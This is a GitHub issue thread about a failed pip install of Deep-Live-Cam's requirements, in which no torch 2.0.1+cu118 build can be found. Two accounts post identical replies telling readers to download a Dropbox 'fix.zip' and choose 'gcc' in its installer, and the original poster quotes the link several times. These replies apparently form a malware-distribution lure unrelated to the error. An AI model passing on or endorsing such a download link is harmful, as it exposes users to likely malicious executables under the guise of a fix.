### ISSUE TITLE
pip install -r requirements.txt ERROR 

### ISSUE THREAD

**Issue by cellker00** [hacksider/Deep-Live-Cam#458]
PS C:\Users\jc678\Deep-Live-Cam> pip install -r requirements.txt
Looking in indexes: https://pypi.org/simple, https://download.pytorch.org/whl/cu118
Ignoring torch: markers 'sys_platform == "darwin"' don't match your environment
Ignoring torchvision: markers 'sys_platform == "darwin"' don't match your environment
Ignoring onnxruntime: markers 'sys_platform == "darwin" and platform_machine != "arm64"' don't match your environment
Ignoring onnxruntime-silicon: markers 'sys_platform == "darwin" and platform_machine == "arm64"' don't match your environment
Ignoring tensorflow: markers 'sys_platform == "darwin"' don't match your environment
Collecting numpy==1.23.5 (from -r requirements.txt (line 3))
  Using cached numpy-1.23.5-cp310-cp310-win32.whl.metadata (2.3 kB)
Collecting opencv-python==4.8.1.78 (from -r requirements.txt (line 4))
  Using cached opencv_python-4.8.1.78-cp37-abi3-win32.whl.metadata (20 kB)
Collecting onnx==1.16.0 (from -r requirements.txt (line 5))
  Using cached onnx-1.16.0-cp310-cp310-win32.whl.metadata (16 kB)
Collecting insightface==0.7.3 (from -r requirements.txt (line 6))
  Using cached insightface-0.7.3.tar.gz (439 kB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting psutil==5.9.8 (from -r requirements.txt (line 7))
  Using cached psutil-5.9.8-cp37-abi3-win32.whl.metadata (22 kB)
Collecting tk==0.1.0 (from -r requirements.txt (line 8))
  Using cached tk-0.1.0-py3-none-any.whl.metadata (693 bytes)
Collecting customtkinter==5.2.2 (from -r requirements.txt (line 9))
  Using cached customtkinter-5.2.2-py3-none-any.whl.metadata (677 bytes)
Collecting pillow==9.5.0 (from -r requirements.txt (line 10))
  Using cached Pillow-9.5.0-cp310-cp310-win32.whl.metadata (9.7 kB)
ERROR: Could not find a version that satisfies the requirement torch==2.0.1+cu118 (from versions: none)
ERROR: No matching distribution found for torch==2.0.1+cu118

**Comment by cellker00** [comment]
HELP ME PLS

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by cellker00** [comment]
> Baixar https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 No menu do instalador, selecione "gcc".

esse link nn ta funcionado

**Comment by cellker00** [comment]
> Baixar https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 No menu do instalador, digite "gcc".

link nn funciona

**Comment by cellker00** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

link is not working

**Comment by cellker00** [comment]
> > Baixar https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 No menu do instalador, digite "gcc".
> 
> link is not working

**Comment by cellker00** [comment]
> > Baixar https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 No menu do instalador, digite "gcc".
> 
> link is not working

**Comment by cellker00** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

link is not working

**Comment by cellker00** [comment]
help me pls

**Comment by wolverinex24** [comment]
try pip install --use-pep517 -r requirements.txt

**Comment by FeedHedgehog** [comment]
Still EERORS ,Mac book pro m1 max 64G ram
![8bec96f503e248c56e52d28b2a0bbd8a](https://github.com/user-attachments/assets/1a4a250a-74f8-49ea-a5db-35d690a366d0)
